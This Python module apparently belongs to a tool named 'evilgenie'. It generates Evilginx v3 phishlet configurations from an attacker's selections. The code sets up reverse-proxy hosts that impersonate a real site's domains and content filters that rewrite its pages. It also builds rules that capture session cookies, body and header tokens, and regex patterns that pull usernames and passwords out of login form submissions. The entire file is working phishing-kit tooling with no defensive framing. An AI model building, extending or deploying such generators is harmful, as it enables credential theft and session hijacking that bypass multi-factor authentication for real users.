"""
Phishlet YAML rendering for evilgenie.

Builds an Evilginx v3 phishlet from the attacker's menu selections.
Rendered by hand (not via PyYAML) to match the conventional phishlet style:
flow-style maps for proxy_hosts / sub_filters, block style elsewhere.
"""

import ipaddress
import re

MIN_VER = "3.0.0"
DEFAULT_MIMES = ["text/html", "application/json", "application/javascript"]


def split_host(host):
    """Split a hostname into (orig_sub, domain) using a naive last-two-labels
    heuristic. Handles IPs and single-label hosts (e.g. localhost)."""
    try:
        ipaddress.ip_address(host)
        return "", host
    except ValueError:
        pass
    labels = host.split(".")
    if len(labels) <= 2:
        return "", host
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def q(value):
    """YAML single-quoted scalar."""
    return "'" + str(value).replace("'", "''") + "'"


def _flow(pairs):
    """Render a flow-style map: {key: 'val', key2: true}"""
    inner = ", ".join(f"{k}: {v}" for k, v in pairs)
    return "{ " + inner + " }"


def _str_list(items):
    return "[" + ", ".join(q(i) for i in items) + "]"


def render(sel):
    """Render the full phishlet YAML text from the selection dict."""
    out = []
    a = out.append

    a(f"# Phishlet generated by evilgenie")
    a(f"name: {q(sel['name'])}")
    a(f"min_ver: {q(MIN_VER)}")
    a(f"redirect_url: {q(sel['redirect_url'])}")
    a("")

    # proxy_hosts
    a("proxy_hosts:")
    for h in sel["proxy_hosts"]:
        pairs = [
            ("phish_sub", q(h["sub"])),
            ("orig_sub", q(h["sub"])),
            ("domain", q(h["domain"])),
        ]
        if h.get("port"):
            pairs.append(("port", q(h["port"])))
        pairs += [
            ("session", "true" if h["session"] else "false"),
            ("is_landing", "true" if h["is_landing"] else "false"),
            ("auto_filter", "true"),
        ]
        a(f"  - {_flow(pairs)}")
    a("")

    # sub_filters
    if sel["sub_filters"]:
        a("sub_filters:")
        for f in sel["sub_filters"]:
            pairs = [
                ("triggers_on", q(f["triggers_on"])),
                ("orig_sub", q(f["orig_sub"])),
                ("domain", q(f["domain"])),
                ("search", q(f["search"])),
                ("replace", q(f["replace"])),
                ("mimes", _str_list(f.get("mimes", DEFAULT_MIMES))),
            ]
            a(f"  - {_flow(pairs)}")
        a("")

    # auth_tokens
    cookie_tokens = sel.get("cookie_tokens", [])
    body_tokens = sel.get("body_tokens", [])
    http_tokens = sel.get("http_tokens", [])
    if cookie_tokens or body_tokens or http_tokens:
        a("auth_tokens:")
        for ct in cookie_tokens:
            a(f"  - domain: {q(ct['domain'])}")
            a(f"    keys: {_str_list(ct['keys'])}")
            a(f"    type: 'cookie'")
        for bt in body_tokens:
            a(f"  - domain: {q(bt['domain'])}")
            a(f"    path: {q(bt['path'])}")
            a(f"    name: {q(bt['name'])}")
            a(f"    search: {q(bt['search'])}")
            a(f"    type: 'body'")
        for ht in http_tokens:
            a(f"  - domain: {q(ht['domain'])}")
            a(f"    path: {q(ht['path'])}")
            a(f"    name: {q(ht['name'])}")
            a(f"    header: {q(ht['header'])}")
            a(f"    type: 'http'")
        a("")

    # credentials
    creds = sel.get("credentials", {})
    if creds.get("username") or creds.get("password") or creds.get("custom"):
        a("credentials:")
        for category in ("username", "password"):
            c = creds.get(category)
            if c:
                a(f"  {category}:")
                a(f"    key: {q(c['key'])}")
                a(f"    search: {q(c['search'])}")
                a(f"    type: {q(c['type'])}")
        if creds.get("custom"):
            a("  custom:")
            for c in creds["custom"]:
                a(f"    - key: {q(c['key'])}")
                a(f"      search: {q(c['search'])}")
                a(f"      type: {q(c['type'])}")
        a("")

    # auth_urls
    if sel.get("auth_urls"):
        a("auth_urls:")
        for p in sel["auth_urls"]:
            a(f"  - {q(p)}")
        a("")

    # login
    a("login:")
    a(f"  domain: {q(sel['login']['domain'])}")
    a(f"  path: {q(sel['login']['path'])}")

    return "\n".join(out) + "\n"


def credential_entry(field):
    """Build a credentials entry from a captured POST field."""
    if field["ctype"] == "json":
        leaf = field["name"].split(".")[-1]
        return {"key": "", "search": f'"{leaf}":"([^"]*)', "type": "json"}
    return {"key": re.escape(field["name"]), "search": "(.*)", "type": "post"}
